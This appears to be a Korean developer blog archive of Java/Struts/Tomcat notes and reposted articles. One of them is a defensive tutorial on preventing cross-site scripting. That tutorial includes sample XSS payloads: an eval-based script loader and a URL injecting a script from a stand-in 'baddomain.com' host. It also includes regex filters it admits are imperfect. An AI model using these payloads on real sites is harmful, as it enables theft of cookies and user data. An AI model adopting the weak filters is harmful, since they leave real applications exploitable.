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출처 : http://www.vitarara.org/cms/struts_2_cookbook/post_and_redirect

<action name="createSalesOrderConfirmation" class="sales.CreateSalesOrderAction">
<result name="redirect" type="redirect-action">
<param name="actionName">displaySalesOrder</param>
<param name="namespace">/order/sales</param>
<param name="parse">true</param>
<param name="id">${order.id}</param>
Posted by tornado

Struts2 에서는 아래와 같은 방법으로 사용 가능합니다.


src/defaultConfigure.properties format 을 등록.


# number format

format.qty={0,number, ,###,###,###}


JSP 페이지에서는 다음과 같이 호출합니다.


<s:text name="format.qty"><s:param name="value" value="%{10000}"/></s:text>


결과는 10,000 과 같이 출력됩니다.

Posted by tornado
출처 : http://saloon.javaranch.com/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic&f=56&t=006418

자바를 너무 오랫동안 안했나보다... 완전 허무 ...

You should be able to delete ${catalina.home}/work/Catalina/localhost/appName/SESSION.ser where appName is your application (or just delete the whole work directory).

This should enable you to restart.

Posted by tornado
출처 : http://struts.apache.org/2.0.12/docs/how-do-i-set-a-global-resource-bundle.html

In Struts 2, resource bundles can be associated with classes. The framework will automatically discover and load class-orientated resource bundles. You can also specify one or more global resource bundles, which would be available to all classes in the application, using either the standard properties file, or a custom listener.

Properties file

Global resource bundles can be specified in the struts.properties configuration file.

The framework searches the class heirarchy first, then, as a last resource, checks the global resources.

Multiple resource bundles can be specified by providing a comma-separated list.

struts.custom.i18n.resources=global-messages, image-messages


Aside from the properties file, a Listener could also be used to load global resource bundles.

public class ActionGlobalMessagesListener implements ServletContextListener {
private static Logger log = Logger.getLogger(ActionGlobalMessagesListener .class);
private static final String DEFAULT_RESOURCE = "global-messages";

* Uses the LocalizedTextUtil to load messages from the global message bundle.
* @see
public void contextInitialized(ServletContextEvent arg0) {
log.info("Loading global messages from " + DEFAULT_RESOURCE);
log.info("Global messages loaded.");

* @see javax.servlet.ServletContextListener#contextDestroyed(javax.servlet.ServletContextEvent)
public void contextDestroyed(ServletContextEvent arg0) {

// do nothing


(under listeners section)


Posted by tornado



읽어보구 현재 프로젝트에 적용할 수 있을때 해야겠다.

Posted by tornado
Posted by tornado

JSP/Servlet 환경에서 다운로드를 사용할 경우는
아래와 같은 순서를 가진다.

1. HttpServletResponse 로 부터 OutStream 을 얻는다.
2. Header, ContentsType 등을 설정한다.
3. FileStream 을 통해 전송될 파일의 스트림을 얻는다.
4. Response 로 부터 얻은 outputStream 에 파일을 쏜다.
5. 열려진 모든 자원을 닫는다.

뭐 다른것들은 괜찮지만  2번 항목에서 환경에 따라 헤더 설정이 틀려진다.
단독 WAS 환경인지, WAS 앞에 Apache 나 IIS 가 있는지 등등..

웬만한 부분에서는 아래와 같은 Header 설정이면 충분하다.

res.setHeader("Content-Transfer-Encoding", "binary;");
res.setHeader("Pragma", "no-cache;");
res.setHeader("Expires", "-1;");

res.setHeader("Content-Disposition", "attachment; filename=" + fileName + ";");

문제는 위 설정으로 zip 파일이나, 다른 파일들은 저장, 열기가 잘 되지만 유독 HWP 파일에서 문제가 생긴다.

다운로드 창까지는 잘 뜨는데, 열기 버튼을 누르면 파일을 찾을 수 없다고 나온다.

저장해서 보면 잘 보이지만 ㅎㅎ

여차저차 해서 헤더에 아래와 같이 추가해줬다.


잘 된다 ^^

캐시 컨트롤을 private 으로 하겠다는 의미는 전송되는 개체가 공유 캐시에 보관되지 않고 특정 클라이언트만을 대상으로 해야 한다는 말이다.

Posted by tornado

Preventing Cross Site Scripting Attacks

Posted by gmurray71 on September 27, 2006 at 12:01 PM | Comments (9)

Preventing Cross Site Scripting Attacks

Cross site scripting (XSS) is basically using JavaScript to execute JavaScript from an unwanted domain in a page. Such scripts could expose any data in a page that is accessible by JavaScript including, cookies, form data, or content to a 3rd party. Here is how you can prevent your web pages from being exploited on both the client and the server. This is followed with tips on how to avoid vulnerable sites.

  • Escape parameters and User Input - The safest step you can take is to escape all parameters to a page where the parameters are displayed in the content.The same applies for any user input that may be displayed or re-displayed in a web page rendered by a server. The downside is that your users can not provide markup.
  • Remove eval(), javascript, and script from User Provided Markup - If you allow users to provide markup in any part of your application that is displayed in a page make sure to remove eval() and javascript: calls from element attributes including styles as they can be used to execute JavaScript. Also remove script blocks.
  • Filter User Input on the Server - You should always filter user input that is stored or processed on a server because URLs and GET/POST requests can be created manually.
  • Use Caution with Dynamic Script Injection - Be careful when dynamically injecting external scripts to retrieve JSON based data as you are potentially exposing everything accessible by JavaScript.
  • Avoid XSS Phishing Attacks - Be aware of sites that contain vulnerabilities and phishing style attacks containing external script references.

Escape Parameters and User Input

This is the classic XSS attack that can open your service or web application up to hackers. By design the site displays a user's id that is passed in as a URL parameter. The following script will take the id and display a welcome message.

<script type="text/javascript">
  var start = window.location.href.indexOf("id");
  var stop = window.location.href.length;
  var id = "guest";
  if (start < stop) {
    id = decodeURIComponent(window.location.href.substring(start,stop));
  document.write("Hi " + id);

A request to the URL index.html?id=greg (assuming the page containing the script is index.html) will result in:

Hi greg

What would happen if instead of "greg" I used the following URL:


Notice the URL above contains a link to script http://baddomain.com/badscript.js which contains malicious code from a different domain. This script will be evaluated when the page is loaded putting the page and all the data in it at risk.

To prevent from these types of attacks your client code should always escape "<" and ">" parameters that are displayed or evaluated by JavaScript code.

You can do this with a simple line of code as can be seen in the next example.

<script type="text/javascript">
  var start = window.location.href.indexOf("id");
  var stop = window.location.href.length;
  var id = "guest";
  if (start < stop) {
    id = decodeURIComponent(window.location.href.substring(start,stop));
  document.write("hi " + id);

Consider the following containing a form where a user enters a description that will be visible to other users.

<script type="text/javascript">
  function displayName() {
    var description = document.getElementById("description").value;
    var display = document.getElementById("display");
    display.innerHTML = description;
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
<div id="display"></div>

Seems innocent enough right? Try including the following content in the text area.

<a onmouseover="eval('s=document.createElement(\'script\'); document.body.appendChild(s); s.src=\'badscript.js\'')">Mouse Over Me</a>

A mouseover of the link will cause a script in a badscript.js to be loaded. This script could also pass along cookies or any other information it wanted to as parameters of the "s.src" URL. Unlike the first example where the user would need to click on a bad link this type of attack requires a simple mouseover to load the badscript.js.

So the question now comes to mind: 'How do you protect your web page from being being exploited?'

Along with the parameters you should escape form input. If you plan to allow users to provide their own markup consider the next solution titled Remove eval(), javascript, and script from User Provided Markup.

The following code shows how to escape markup on the client.

<script type="text/javascript">
  function displayName() {
    var description = document.getElementById("description").value;
    var display = document.getElementById("display");
    description = description .replace(/</g, "&lt;").replace(/>/g, "&gt;");
    display.innerHTML = description;
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
<div id="display"></div>

The code description = description.replace(//g, ">"); filters the user input and prevents unwanted scripts from being executed.

Now that we have looked at how to prevent most attacks the next section focuses on cases where you want to allow users to provide markup that does not contain malicious code.

Remove eval(), javascript:, and script from User Provided Markup

There may be cases where you want to allow a user to add markup such as links or HTML content that is displayed for other users to see. Consider a blog that allows for HTML markup, user provided URLs, HTML comments, or any other markup. The solution would be to filter all markup before it is displayed in a page or before it is sent to a server or service. The following example shows how to allow for some HTML markup while preventing malicious code.

<script type="text/javascript">
  function displayName() {
    var description = document.getElementById("description").value;
    var display = document.getElementById("display");
    description.replace(/[\"\'][\s]*javascript:(.*)[\"\']/g, "\"\"");
    description = description.replace(/script(.*)/g, "");    
    description = description.replace(/eval\((.*)\)/g, "");
    display.innerHTML = description;
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
<div id="display"></div>

The example above removes all eval(), javascript and script references that may be entered in the description field. The replacement here is not a perfect as it may replace legitimate uses of the words javascript and script in the body of a document. You may consider refining the regular expressions to only look in tag attributes for example and to remove full scripts. There are other considerations you should keep in mind when filtering client code such as line breaks, charsets, case sensitivity which are commonly exploited in attacks. As some browsers will allow you to specify JavaScript calls from CSS styles you should also consider searching user provided CSS styles as well.

Filter User Input on the Server

Most of the problems related to cross site scripting are because of poorly designed clients. Servers can also unwillingly become participants in cross domain scripting attacks if they redisplay unfiltered user input. Consider the following example where a hacker manually makes a HTTP POST request to set the homepage URL with the following.

<a href="javascipt:eval('alert(\'bad\')');">Click Me</a>

The URL would end up being stored as is on the server as is and expose any user that clicks on the URL to the JavaScript. The example above seems innocent enough but consider what would happen if in place of an alert('bad') the "javascript" contained malicious code. To prevent such attacks you should filter user input on the server. The following Java example shows how to use regular expression replacement to filter user input.

String description = request.getParameter("description");
description = description.replaceAll("<", "&lt;").replaceAll(">", "&gt;");
description = description.replaceAll("eval\\((.*)\\)", "");
description = description.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");
description = description.replaceAll("script", "");

The code above removes eval() calls, javascript: calls, and script references the replacement here is not a perfect as it may replace legitimate uses of the words javascript and script in the body of a document. The code above may be applied using a servlet, servlet filter, or JSF component on all input parameters or on a per parameter basis depending on what how much markup you would like to allow users to provide. You may want refine the regular expressions that filter the content to handle more or consider a Java library built that specializes in removing malicious code.

Use Caution with Dynamic Script Injection

Dynamic script injection to retrieve JSON data (also known as JSONP) can be powerful and useful as it decouples your client from the server of origin. There is still a bit of debate over using JSONP as some consider it as a hack or security hole in JavaScript because when you dynamically include a reference to a 3rd party script you are giving that script full access to everything in your page. That script could go on to inject other scripts or do pretty much whatever it wanted.

If you choose to use JSONP make sure you trust the site for which you are interacting with. There is nothing stopping a JSONP provider from including unwanted script with JSONP data. One alternative would be to provide a proxy service which you can control the output, restrict access to, and can cache as needed.

Avoid XSS Phishing Attacks

This next recommendation focuses on protecting yourself as a user from a site that is vulnerable to cross site scripting attacks.

Phishing attacks, or attacks where what appears to be a valid URL links to a fraudulent web page who's purpose is to collect a users data, are nothing new to the web world. A related attack involves cross site scripting attacks where a URL to a legitimate site that has a cross site scripting vulnerability contains a script reference. Such a link may appear in an email message, blog posting/comment, or other user generated content that contains a URL. Clicking a link to a site containing a cross site scripting vulnerability would cause a 3rd party script to be included along with your request and could expose your password, user id, or any other data. Consider the following example:

<a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a>

A quick look at the URL shows it references the site http://foobar.com/index.html. An unsuspecting user may not see the script included as a parameter later in the URL.

It is also wise to always look at carefully at URLs and the URL parameters that are provided with them. URLs will always appear in the status bar of your browser as and you should always look for external script reference. Another solution would be to manually type in links into the URL bar of your browser if a link is suspect.

Be aware of sites known to have vulnerabilities and be very careful with any personal data you provide those sites.

While JavaScript based interfaces can be very flexible you need to be very careful with all user provided input whether it be as parameters or form data. Always make sure to escape or filter input on the both the client and server. As a user you should be cautious not to become a victim of a vulnerable site. It's better to be safe than in the news!

What other things do you do to prevent XSS attacks?

Posted by tornado
대충 에러메세지가 아래와 같다.

        at com.opensymphony.module.sitemesh.taglib.decorator.TitleTag.doEndTag(TitleTag.java:32)

나는 sitemesh 의 decorator.xml 설정에 <excludes> 를 사용한다.

이 태그에 포함되어진 페이지는 sitemesh 장식자에서 제외된다.

그런데.. 디자인 변경작업중에 잘라내기/붙여넣기 도중 사이트메시 장식자에서 제거된 페이지에

<title><decorator:title default=" 사이트 타이틀 " /></title>

이 부분이 포함이 되어 있었던 상황이다.

이 부분이 없으니 사이트메시 태그라이브러리의 getPage().getTitle() 에서

널포인터 익셉션을 출력한 것이였다.

copy & paste  작업중 맘이 급해 생긴 상황이다.
Posted by tornado


Project jMaki

jMaki is all about enabling Java developers to use JavaScript in their Java based applications as either a JSP tag library or a JSF component. jMaki uses the best parts of Java and the best parts of JavaScript to deliver a rich AJAX style widgets.

jMaki currently provides bootstrap widgets for many components from Dojo, Scriptaculus, Yahoo UI Widgets, Spry, DHTML Goodies, and Google. jMaki provides a common interfaces to these widget libraries and allows you to use these libraries together in the same page.

For more on running the code see Running the jMaki Sample Application.

If you plan on using or developing your own jMaki widgets please see the jMaki Developer Documentation.

Download the jMaki web application which contains all the latest components (updated 06/16/2006). The web application has been tested against the latest builds of Glassfish. jMaki is written as a JSP 2.0/JSF 1.1 tag library and should run on earlier containers that support JSP 2.0 and/or JSF 1.1 specifications.

Interested in creating rapidly Web Applications using the jMaki project? Check out the NetBeans 5.5 jMaki plugin that allows Drag and Drop of jMaki components directly in your JSP pages. Watch the screencast demonstrating the plugin capabilities (audio and video).

Posted by tornado

이클립스 3.1 에서 native2ascii 설정하는 방법을 찾다보니 없어서 올립니다.

1)Help > Software Updates > Find and Install

위에 처럼 설정한 다음...그림 3번째 처럼 방금 입력한 것에 체크하고 FInish 를 누르면 업데이트창에 뜨게 된다.
그러면 native2ascii 받게 되는데... 몽땅 체크 하고 다운받고 라이센스에 동의하면 된다.
사이트의 내용을 올린다.

  1. Please choose from the screen of Eclipse with "Help" ->"Software Updates" -> "Update Manager". An 'Update Manager' opens.

  2. In the "Feature Updates" view at the lower left of an 'Update Manager', please carry out the right click of the "Sites to Visit", and create a site bookmark by "New" -> "Site Bookmark...".
    - The bookmark to create should input the following "URL" and should push an "Finish" button.
    Name: Arbitrary input
    URL : http://propedit.sourceforge.jp/eclipse/updates/
    Bookmark type: Eclipse update site

  3. If a site bookmark is created, the bookmark created at the bottom of "Feature Updates" will appear.
    A click of "jp.gr.java_conf.ussiy.app.propedit.eclipse.feature.PropertiesEditorFeature x.x.x" displays a preview on a right window. Since the button "Install Now" is in around the lower right, please click.

  4. Since an installation wizard starts, please click a "Next" button rapidly.

  5. "You will need to restart the workbench for the changes to take effect. Would you like to restart now?" is displayed. Please reboot Eclipse according to a dialog.

Posted by tornado


스프링, 하이버네이트랑 연결두 되네~

요새는 닷넷만 개발하는데 과연 쓸 일이 있을 것인가~~~

Posted by tornado



jsp, javascript, XML/SOAP, ayax 등으로 만들어 졌네요.. 소스 크기가 무려 150MB나 되는 대형 프로젝트입니다.

아웃룹의 오픈소스 웹버전이라 생각하면 되겟습니다..

기능은 강력하지만, ,속도가 좀 안나온다는 단점이 있네요..

웹 어플리케이션의 전망을 점쳐볼수 있을 정도입니다.


관련 자료는 아래에서 받으실수 있습니다.

Zimbra Collaboration Suite 2005 Beta – Open Source


Related Documentation:

Migration Wizard

Related Documentation:

Flash Demo



데모와 스크린 샷은 아래에서 즐기세요


  • Flash Demo
  • Hosted Demo
  • Screen Shots



    Inbox - View messages as conversation threads or individually, with message text preview


    Conversation - See all messages in a thread - inbox, sent, filed, even trash - in one view

    Search Builder

    Search Builder - Build dynamic searches for attachments, message text, domains, even phone numbers


    More Calendar

    Calendar - See all of your scheduled appointments and their status; mouseover for full details


    Contacts - Add contacts directly from email; mouseover to view details

    Admin - COS Preferences

    Admin - Distribution List

    Admin - New Account Wizard

    Admin - Volume Management

    'JAVA > JSP_Servlet' 카테고리의 다른 글

    이클립스에서 native2ascii 설정하기  (0) 2006.05.10
    http://zk1.sourceforge.net/  (0) 2006.05.10
    No solutions exist for "NotifyUtil::java.net.ConnectException  (2) 2005.12.03
    [펌] 자바툴(솔루션) 정리  (0) 2005.11.16
    sitemesh ..  (0) 2005.11.09
    Posted by tornado
    This topic has 8 replies on 1 page.
    Hi, I get the following error when I load a webpage that is on a tomcat 5.0 server.... It repeats about 3-5 times just from loading a page any ideas?

    NotifyUtil::java.net.ConnectException: Connection refused: connect
    at java.net.PlainSocketImpl.socketConnect(Native Method)
    at java.net.PlainSocketImpl.doConnect(PlainSocketImpl.java:305)
    at java.net.PlainSocketImpl.connectToAddress(PlainSocketImpl.java:171)
    at java.net.PlainSocketImpl.connect(PlainSocketImpl.java:158)
    at java.net.Socket.connect(Socket.java:452)
    at java.net.Socket.connect(Socket.java:402)
    at sun.net.NetworkClient.doConnect(NetworkClient.java:139)
    at sun.net.www.http.HttpClient.openServer(HttpClient.java:402)
    at sun.net.www.http.HttpClient.openServer(HttpClient.java:618)
    at sun.net.www.http.HttpClient.<init>(HttpClient.java:306)
    at sun.net.www.http.HttpClient.<init>(HttpClient.java:267)
    at sun.net.www.http.HttpClient.New(HttpClient.java:339)
    at sun.net.www.http.HttpClient.New(HttpClient.java:320)
    at sun.net.www.http.HttpClient.New(HttpClient.java:315)
    at sun.net.www.protocol.http.HttpURLConnection.plainConnect(HttpURLConnection.java:521)
    at sun.net.www.protocol.http.HttpURLConnection.connect(HttpURLConnection.java:498)
    at sun.net.www.protocol.http.HttpURLConnection.getOutputStream(HttpURLConnection.java:569)
    at org.netbeans.modules.web.monitor.server.NotifyUtil$RecordSender.run(NotifyUtil.java:237)
    Hi, I'm fairly new to java and trying to download a web page page with th help of URL object and I get the following Exception:

    java.net.ConnectException: Connection timed out: connect
    at java.net.PlainSocketImpl.socketConnect(Native Method)
    at java.net.PlainSocketImpl.doConnect(Unknown Source)
    at java.net.PlainSocketImpl.connectToAddress(Unknown Source)
    at java.net.PlainSocketImpl.connect(Unknown Source)
    at java.net.Socket.connect(Unknown Source)
    at java.net.Socket.connect(Unknown Source)
    at java.net.Socket.<init>(Unknown Source)
    at java.net.Socket.<init>(Unknown Source)
    at HttpConnection.conectare(HttpConnection.java:92)
    at HttpConnection.incarca(HttpConnection.java:58)
    at HttpConnection.main(HttpConnection.java:44)

    Can anybody help me?
    Shoud I know about a proxy or something like that? :)
    it means that u can't connect to the server. try to ping to the server and see the result.
    i don't know if that reply refeared to me or not... but in case it did thank you... I figured out what was wrong with it :)) i have a proxy and i did a small modification to my code i simply added the following lines before I used the URLConnection object:
    // Modify system properties
    Properties sysProperties = System.getProperties();

    // Specify proxy settings
    sysProperties.put("proxyHost", "");
    sysProperties.put("proxyPort", "3128");
    sysProperties.put("proxySet", "true");

    easy isn't it?
    I had this problem from installing netbeans. I uninstalled it, but there was still some configurations in the <catilina home>/config/web.xml file. Remove the following:

    If you want an IDE, perhaps you'd like to try eclipse.

    edit your [$TOMCAT_HOME]/conf/web.xml file and rip out the following section from the top - where Netbeans snuck it in, and didn't remove - even if i uninstalled it

    GO POST your QUESTION in your OWN thread!
    Thanks jwolter, will try.
    This worked. I did have NetBeans installed but thought the error was originating from Eclipse. Thanks for the help jwolter.
    Yes, this works for me. I installed NetBeans but never notice that. I confused why get connetion refused even if access into Now everything works fine. Thanks jwolter!

    'JAVA > JSP_Servlet' 카테고리의 다른 글

    http://zk1.sourceforge.net/  (0) 2006.05.10
    [펌] 오픈소스 메일 서버/클라이언트 zimbra  (0) 2005.12.23
    [펌] 자바툴(솔루션) 정리  (0) 2005.11.16
    sitemesh ..  (0) 2005.11.09
    [펌] JSF의 새로운 얼굴, MyFaces  (0) 2005.10.27
    Posted by tornado
    [펌] 자바툴(솔루션) 정리 | SE 포스트 삭제 2004/07/20 15:48
    출처 : joomanba님의 블로그



    Cougaar has a Java-based architecture for the construction of large-scale distributed agent-based applications. It is the product of a multi-year DARPA research project into large scale agent systems and includes not only the core architecture but also a variety of demonstration, visualization and management components to simplify the development of complex, distributed applications.


    IBM Aglet Kit

    Hawaii Aglet Server

    Artificial Intelligence/Expert Systems

    JGAP: The Java Genetic Algorithms Package


    JOONE - Java Object Oriented Neural Engine



    Bayes & Naive-Bayes Classifiers



    Authentication and Authorization

    Acegi Security System for Spring




    JAAS in Tomcat


    Virtual File System


    Java POP3 Email Proxy




    URLFetch Java

    HTTP Proxies


    Surfboard Proxy Framework


    Internet Protocols

    Jakarta Commons/Net


    News retrieval from hundreds of websites via their RSS syndication files.


    fetchrss polls weblogs (rss feeds) and e-mails the updates, one message per updated entry. The effect is comparable to the weblog author e-mailing you personally. fetchrss can run in the background on your desktop or server.





    RSSLibJ is a Java class library designed primarily to generate RSS data in various formats, based on a simple object model.

    Connected Graphs




    Arakne Network Editor


    Bouvard & Pecuchet





    The Bouncy Castle Crypto API



    Components and Services




    A compact, powerful, extensible and performant component-oriented software framework written in java, and a collection of components developed for this framework. Jicarilla utilizes and supports inversion of control, seperation of concerns, seperation of interface from implementation, contract-based programming, aspect-oriented programming and event-based programming. To get the buzzwords out of the way :D

    In readable english, Jicarilla provides a platform for developing a wide range of applications and software components. Think of Jicarilla as the glue between your classes, beans, components and/or services. Jicarilla can be used for building and glueing together a wide variety of applications. Whether you build web services, server applications, servlets, enterprise javabeans, desktop applications, or applets, Jicarilla will make it easier.



    The Merlin project deals with the broad area of service and component management. The Merlin system is a container that provides comprehensive support for the management of complex component-based systems. Merlin uses a component meta-model to facilitate the automated assembly and deployment of components.

    NanoContainer (see also PicoContainer)




    Mule is a light-weight messaging framework. It can be thought of as a highly distributable object broker that can seamlessly handle interactions with other applications using disparate technologies such as Jms, Http, Email, and Xml-Rpc.The Mule framework provides a highly scalable environment in which you can deploy your business components. Mule manages all the interactions between components transparently whether they exist in the same VM or over the internet and regardless of the underlying transport used.

    Mule was designed around the Enterprise Service Bus enterprise integration pattern, which stipulates that different components or applications communicate through a common messaging bus, usually implemented using Jms or some other messaging server. Mule goes a lot further by abstracting Jms and any other transport technology away from the business objects used to receive messages from the bus.

    Web Application





    Socket Communications







    ZVTM: Zoomable Visual Transformation Machine

    Barcode Generation






    Chart 2D















    Java based









    Generation of reports from databases or other data sources.




    Intercepting and Modifying Commands



    the display tag library





    Jestr--pronounced like "jester"--is a Java Reflection-based library that provides an extensible framework for defining the way objects are "stringified"--that is, converted into String's for display and logging purposes. It allows the application to define how objects are stringified just by editing a properties file. The style of stringification can be adjusted at runtime, either in a blanket fashion or just for individual classes, class hierarchies, and package hierarchies. Jestr is configurable using a properties file called jestr.properties, which models log4j.properties and should look reasonably familiar to those accustomed to Log4J.




    Log View/Filtering




    Java Object Cache

    JOCache is a Java library that implements strict object caching.

    It's strict in that each cache enforces two limits in a very strict and predictable way.

    Very Large Hashtable


    Java FEC (Forward Error Correction) Library


    SiteMesh is a web-page layout and decoration framework and web- application integration framework to aid in creating large sites consisting of many pages for which a consistent look/feel, navigation and layout scheme is required.

    Xephyrus Flume Pipeline

    Flume is a component pipeline engine. It allows you to chain together multiple workers into a pipeline mechanism. The intention of Flume is that each of the workers would provide access to a different type of technology. For example, a pipeline could consist of a Jython script worker followed by a BeanShell script worker followed by an XSLT worker.

    The pipeline workers can contain any custom code, however the intention behind Flume is that the workers would implement different scripting languages. This provides a means of separating distinct functionality of the work-flow. For example, if Al understands the business flow and Betty is really good at making it look good, Al could write his piece in Jelly and Betty could do her work in XSL. The pipeline could then execute Al's script, then do Betty's transformation, spewing out some nice document.


    The JReleaseInfo AntTask generates a java source file with getter methods for the build date of the program, a build number or the version.



    Blitz JavaSpaces

    The purpose of the Blitz project is to further the use of JavaSpaces and JINITM through the provision of essential resources such as:



    Instant Messaging

    Echomine Muse

    Echomine Muse is a library intended to make communication across a wide variety of protocols (including Jabber, Napster, Gnutella, and more) easy and somewhat consistent.

    Object Persistence


    Jing DAO Framework



    SwarmCache is a simple but effective distributed cache. It uses IP multicast to efficiently communicate with any number of hosts on a LAN. It is specifically designed for use by clustered, database-driven web applications. Such applications typically have many more read operations than write operations, which allows SwarmCache to deliver the greatest performance gains. SwarmCache uses JavaGroups internally to manage the membership and communications of its distributed cache.

    Object-XML Binding





    XML Databases



    Program Distribution



    Java Web Start/JNLP

    Java Web Start


    Reading and Writing XML





    Element Construction Set

    The Element Construction Set makes it easy for you to build structured XML from a series of calls to objects. It tries to make sure you can't generate something that is not well-formed at the least, even if it is not necessarily well structured. I've used this in the past and found it easy to use but it seems to have fallen from favor. The last time I looked there wasn't much new activity and most people I work with tend to push for using JDOM for this purpose.


    Library functions to find differences between XML documents and represent those differences as a series of edit operations (again in XML form). Sample code is provided to make it easy to not only find the differences but also to patch an existing file to make it look like a new one.


    Binary XML






    Clover ETL


    Remote Procedure Calls




    Apache Axis



    Apache XML-RPC (formerly the Helma XML-RPC library)





    Bean Scripting Framework




    Jakarta Lucene is a high-performance, full-featured text search engine written entirely in Java. It is a technology suitable for nearly any application that requires full-text search, especially cross-platform.

    Relevant links

    Server Administration


    Java Service Wrapper


    JMX offers a simple way for you to package server components so you can make them administrable locally or remotely. JBoss and many other server packages now make their components MBeans (managable beans) just to get this functionality.

    Consider it seriously for any server software you might be building.

    MC4J Management Console




    JMX Homepage (Reference JMX Implementation Available Here)

    AdventNet Agent Toolkit Java/JMX Edition

    Modeler Component

    JMX taglib



















    Date & Time Selector Component (commercial)

    Can be customized to pick Date, Time or Date & Time.

    Unavailable dates can be set. User selection is disabled for unavailable dates.

    Clock needles can be dragged to change time.

    Class Library includes separate Calendar Panel and Clock Panel for other use.

    Unlimited runtime distrubution without any royalty


    Glazed Lists

    Suppose you have a list of 1,000 objects to browse. With Glazed Lists, you can:

    Java Bean Calendar Control





    The Kiwi Toolkit

    New controls for Swing (including a tree table, date control, etc.)

    L2FProd.com Common Components

    A set of new Swing components including a font chooser, directory chooser, property sheet panel, and a really cool task pane.

    Embedded Editors


    Ekit is a free open source Java HTML editor applet and application. The Ekit standalone also allows for HTML to be loaded and saved, as well as serialized and saved as an RTF. It is approaching its first production release version.


    JXMLPad is a pure Swing java component/framework for editing XML/XHTML document.

    Look and Feel

    Want to change the look of your Java application. Here are some ways to do it.

    Oyoaha lookandfeel


    Metouia look & feel

    Windows System Tray Integration

    Java System Tray Manager

    Windows Tray Icon - Java Implementation



    Canvas is a template generator based on the Groovy language. It uses the familiar Velocity Java API to bind variables and allows you to use the full expressivity of Groovy inside your templates.







    UI Compiler







    Extensible Java Profiler


    JAMon offers a set of functions which can be called to record performance data (both duration and number of times executed). The data can be reviewed using an admin JSP.

    JRat: the Java Runtime Analysis Toolkit

    Version Control



    Customer Acceptance Testing

    Unit Testing

    Swing GUI Testing

    Source Code Reformatting



    Jalopy is a source code formatter for the Sun Java programming language. It layouts any valid Java source code according to some widely configurable rules; to meet a certain coding style without putting a formatting burden on individual developers.



    Bonita is a flexible cooperative workflow system, compliant to WfMC specifications, based on the workflow model proposed by the ECOO Team, which incorporates the anticipation of activities as a more flexible mechanism of workflow execution.



    JaWE (Java Workflow Editor) is the first open source graphical Java workflow process editor fully according to WfMC specifications supporting XPDL as its native file format and LDAP connections. It can be used to edit / view every XPDL file which conforms to WfMC specifications.



    The "OpenEmcee Microflow Engine for Java" is an open source framework (Released under MPL 1.1) for developing flexible, manageable, and adaptable applications. It aims to allow application developers to develop well-engineered business-logic intensive application domain software. Drafting from the "Model" and "Controller" layers of the "Model-View-Controller" pattern, it allows developers to separate the business context of their application from their core business functions.

    This separation of context from core implementation encourages development of software units which are easily reusable and require no or little modification to business critical code when implementing new functionality. Also, these units of work ("tasks") can be easily reused in future projects.

    Open For Business


    Jakarta Commons Workflow Project



    The Shark project delivers a workflow server with a difference. Shark is completely based on standards from WfMC and OMG using XPDL as its native workflow definition format. Storage of processes and activities is done using Enhydra DODS.


    Posted by tornado

    sitemesh ..

    JAVA/JSP_Servlet 2005. 11. 9. 22:51



    example 돌려봤는데... 굉장히 심플하게 레이아웃을 만들어주네.

    설정도 어렵지 않고... 아주 편리하겠는걸~

    주말에 낚시갔다와서 문서좀 봐야긋당....

    Posted by tornado

    JSF의 새로운 얼굴, MyFaces



    지금은 웹 프레임워크의 전성시대라고 해도 과언이 아닐 것이다. MVC(Model -View-Controller) 형태의 모델2가 발표된 이후 수많은 웹 프레임워크가 발표됐고, 이런 웹 프레임워크의 난립(?)은 프로젝트 시작부터 어떤 것을 선택해야 할지에 대한 고민을 안겨주었다. 모든 웹 프레임워크가 나름대로 강조하는 장점들이 있지만, 왠지 ‘2%’ 부족하다는 느낌은 우리로 하여금 섣불리 그것을 선택하기를 주저하게 한다. 하지만 난세에 영웅이 난다고 했던가? JSF(Java Sever Faces)는 자바 표준 스펙(JCP-127)이라는 점에서 태생부터가 다른 웹 프레임워크와는 차별성을 보여주고 있다. 또한 스트럿츠 프로젝트의 리더인 Craig R. McClanahan 이 주도하고 스트럿츠의 커미터들이 대거 참여를 했다는 점에서 스트럿츠 이상의 그 무엇을 기대해도 좋을 것이라는 기대감을 갖게 한다.

    JSF의 오픈소스 구현체, MyFaces
    MyFaces는 JSF의 오픈소스 구현체이다. 인큐베이터에서 스트럿츠와 같은 위치인 최상위 프로젝트로 격상된 오픈소스 프로젝트인 것을 보면 ASF에서 MyFaces에 거는 기대가 얼마나 큰 것인지를 알 수 있다. MyFaces는 JSF의 구현체임으로 MVC 모델을 기본으로 한 최신의 웹 애플리케이션 프레임워크이며, 무엇보다 UI 단의 풍부한 컴포넌트는 그 어떤 웹 프레임워크와 비교해도 뒤떨어지지 않는다. 이번 기사에서는 JSF에 대한 설명보다 MyFaces에 포함된 쓸만한 컴포넌트들을 중심으로 설명하고자 한다. <표 1>에는 MyFaces의 동작 여부를 테스트한 리스트를 보여주고 있지만, 다른 버전의 WAS 등에서도 JSP 2.0이 지원될 수 있는 환경만 갖추어진다면 적용하기에는 큰 무리가 없다.

    MyFaces 설치하기
    MyFaces를 동작시켜보기 위해선 다음과 같은 소프트웨어가 필요하다.

    ◆ JDK 1.5 설치
    ◆ 톰캣 5.5.7 설치 : 기존의 톰캣을 사용할 경우 JSF 라이브러리가 있다면 삭제한다(jsf-api.jar, jsf-impl.jar).
    ◆ MyFaces Example 설치
          - <TOMCAT_HOME>/webapps 디렉토리 밑에 war를 설치한다.
          - 톰캣 실행 후  <TOMCAT_HOME>/webapps/myfaces-examples/WEB-INF /lib/commones-el.jar와 jsp-2.0.jar를 삭제한다(톰캣 5.5일 경우만).
          - 톰캣을 재시작한다.

    MyFaces의 다양한 컴포넌트
